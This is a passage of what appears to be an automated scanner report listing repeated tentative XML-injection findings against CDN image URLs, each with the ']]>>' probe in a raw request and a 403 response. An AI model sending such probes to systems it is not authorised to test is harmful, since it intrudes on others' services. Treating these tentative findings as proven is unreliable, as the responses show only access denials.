GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-993333-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: EF2B733D8B34580A
x-amz-id-2: utxwqum4ypR690sRWCsRBHVwhS9seIJxvlPZVEk6OhJE8QaS25AlgjKhNgFu0j7B
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:20 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: ae9ff3ee7246e56ca0043d5d1c573b5760f2138625c3be90fc6ee6704117fca6bf69c70f32db6826
Via: 1.0 e81b6793c2bc2378a5c7ea08e930ec3d.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>EF2B733D8B34580A</RequestId><HostId>utxwqum4ypR690sRWCsRBHVwhS9seIJxvlPZVEk6OhJE8QaS25
...[SNIP]...

8.134. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-cc3333-17px.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-cc3333-17px.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-ff3333-cc3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: DDBBEF72D8EFF466
x-amz-id-2: BDhddrxxQ/jnGgM1XaN/SKDisfxEbcLejIAVvp48MUgaK54Xy8rA6qwzrJSxmpGe
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:07 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: bcb0f7080aa81618f2ec484692a8d7637ac082e08c51ad68773778aab8ea3b0075ac62bb0bb1f768
Via: 1.0 fb63ddec72f5ddb885466333fe83d86e.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>DDBBEF72D8EFF466</RequestId><HostId>BDhddrxxQ/jnGgM1XaN/SKDisfxEbcLejIAVvp48MUgaK54Xy8
...[SNIP]...

8.135. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-cc3333-17px.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-cc3333-17px.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-ff3333-cc3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 629B825C73A5F582
x-amz-id-2: O8oC3fWTiHe6tz196V9Eg3OpamS29r2eL/67nIwFHtiLn1nt1HVKfAGnmzibBUdU
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:15 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: ae7dfa33717bddfbe61bbbc2a29741fa75bc24041be391df064425acb5cb91027ba2fbe75e606f47
Via: 1.0 fb63ddec72f5ddb885466333fe83d86e.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>629B825C73A5F582</RequestId><HostId>O8oC3fWTiHe6tz196V9Eg3OpamS29r2eL/67nIwFHtiLn1nt1H
...[SNIP]...

8.136. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-cc3333-17px.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-cc3333-17px.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-ff3333-cc3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: D8452E3943080B97
x-amz-id-2: X9YEJES9UalHTXMR4n+8gEu4qE3DuRDN+1jp6oxBTKvlCIM20cWU5EarPE1cfxSx
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:19 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 9342bb22db6744973bfc4aef9935c8a02d19c3c4bcb38cea7b450fb7f8cdb0f3488419645767d230
Via: 1.0 557f58686e107bfa2925cf3d6a17c717.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>D8452E3943080B97</RequestId><HostId>X9YEJES9UalHTXMR4n+8gEu4qE3DuRDN+1jp6oxBTKvlCIM20c
...[SNIP]...

8.137. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-cc3333-17px.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-cc3333-17px.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-cc3333-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 6B192F43EB3D22B1
x-amz-id-2: /MPhZWHAli3i9HuO46NMuLm2JBMR1ZBZJro5vj3qNchhwk9SlA4d3nRFATO+H6UJ
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:24 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 73a4f4e60bdae0b11b32161edc3e3ce36f5236821d9dd52a18863505784b4c5d21a0feabf440d496
Via: 1.0 01c55e7d09985466997a27ccf9169a1f.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>6B192F43EB3D22B1</RequestId><HostId>/MPhZWHAli3i9HuO46NMuLm2JBMR1ZBZJro5vj3qNchhwk9SlA
...[SNIP]...

8.138. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-ff3333-17px.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-ff3333-17px.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-ff3333-ff3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 7D947AC38BC4C24B
x-amz-id-2: SSyNlMe6MN1tsSfz0wBueHJ/ASEEIHXHaKl00xX9FjUM37zhSuUgeCJ1lddSWw0T
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:07 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: a770fa60848c135be80f1ed71525cdba1c0f76f6af02ea1245b96e3622127ca10cac763863e53301
Via: 1.0 e1f0363dccfdcada535eb4fd7c2d2e27.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>7D947AC38BC4C24B</RequestId><HostId>SSyNlMe6MN1tsSfz0wBueHJ/ASEEIHXHaKl00xX9FjUM37zhSu
...[SNIP]...

8.139. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-ff3333-17px.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-ff3333-17px.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-ff3333-ff3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 5718732E27C7A18A
x-amz-id-2: HextwXS1y0ZxjjlfEeAqdxAgn5cozSYjs0GQHJirRmskxA4FDzCmUnf8D8Za6h/1
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:14 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 2df3682e55993d0fcd1e61032e430509e472295e82fdcc8583d7a104267eb7c666df4fac22ce5240
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>5718732E27C7A18A</RequestId><HostId>HextwXS1y0ZxjjlfEeAqdxAgn5cozSYjs0GQHJirRmskxA4FDz
...[SNIP]...

8.140. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-ff3333-17px.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-ff3333-17px.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-ff3333-ff3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: FADCD3A3CDEC384E
x-amz-id-2: hdtkVfvaDSn8KVlYKRDQSJOzvNd91iFA6qabwt1dkONUrUS+ZHDC/bXSMb7+zRpE
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:17 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 317ab6cf0d003042a3cffadf50660d27e74a5291f74cd6f4dc984230102427903a6e5b68d170b5a1
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>FADCD3A3CDEC384E</RequestId><HostId>hdtkVfvaDSn8KVlYKRDQSJOzvNd91iFA6qabwt1dkONUrUS+ZH
...[SNIP]...

8.141. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-ff3333-17px.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-ff3333-17px.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-ff3333-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 06BCE8FE03E01579
x-amz-id-2: XbMlLfUuOmy8D3Nn2vkaXNTRhOSaa5u7E6AkQlLkCTLfFkErUywO4uMlxk+0DR5z
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:22 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 456ace92c268b41320ca92ea868cbcc8bf293bba7e8532d285ef8e2d0c1973048bc307d1ad153cf2
Via: 1.0 fb63ddec72f5ddb885466333fe83d86e.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>06BCE8FE03E01579</RequestId><HostId>XbMlLfUuOmy8D3Nn2vkaXNTRhOSaa5u7E6AkQlLkCTLfFkErUy
...[SNIP]...

8.142. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-663333-17px.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-663333-17px.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-ff6633-663333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: A59AF21ECF545A14
x-amz-id-2: KZIDMfnB0dk/+BSHr98bTVFs2Zo8x32t6yFiIcRFlYcEtaZch/V1hLTcMH7r170t
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:55 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: c59f51a4ce3ab26d0d75970982138f85cc9a2324b9fdb53a2fef567a022fd7dbf30f780fbb821be4
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>A59AF21ECF545A14</RequestId><HostId>KZIDMfnB0dk/+BSHr98bTVFs2Zo8x32t6yFiIcRFlYcEtaZch/
...[SNIP]...

8.143. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-663333-17px.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-663333-17px.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-ff6633-663333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 69B0A1BCE831F459
x-amz-id-2: qnN9Z8K50GV0ODlVDPmC+OYapbcGhbXGh3QeZY2L2aWxdTGDPYr5fT+NRy5Os27m
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:00 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 4935e3ea98757691a094dd18f58054ee3523e986c75b420401f87cd73606af77fbed17bfb701cb0b
Via: 1.0 e1f0363dccfdcada535eb4fd7c2d2e27.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>69B0A1BCE831F459</RequestId><HostId>qnN9Z8K50GV0ODlVDPmC+OYapbcGhbXGh3QeZY2L2aWxdTGDPY
...[SNIP]...

8.144. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-663333-17px.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-663333-17px.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-ff6633-663333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: D6EAE93D639422F7
x-amz-id-2: t4W6tCn5nOYApwxsh42lf6XfkQSvkWAskqTgUVJRKTfzybPohalzl/zuK5DechrU
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:09 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 7dca6e726f2450b3178394ce39766a1d6e7f219d50c63eb2ef67394fdce79e3597de44af70596c89
Via: 1.0 d5ba42a2d3d506b64c73b6035a0a9f60.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>D6EAE93D639422F7</RequestId><HostId>t4W6tCn5nOYApwxsh42lf6XfkQSvkWAskqTgUVJRKTfzybPoha
...[SNIP]...

8.145. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-663333-17px.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-663333-17px.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-663333-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: F6DB41A8EFBD2BAA
x-amz-id-2: ew1FVhf5XdT2B7mzmqYc9MhJd9pRDspGpiUMZQEaqKzJzpFlH0RqdqsSHUdvei/A
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:14 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 7487ccfcc824e6b736c561cee7c9b7e235e32afe888c3a5f5d0a52cc1465d23cf0022bd7e5fb1f83
Via: 1.0 86d80ac95b68b3ed6f674f76ea3510aa.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>F6DB41A8EFBD2BAA</RequestId><HostId>ew1FVhf5XdT2B7mzmqYc9MhJd9pRDspGpiUMZQEaqKzJzpFlH0
...[SNIP]...

8.146. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-cc3333-17px.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-cc3333-17px.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

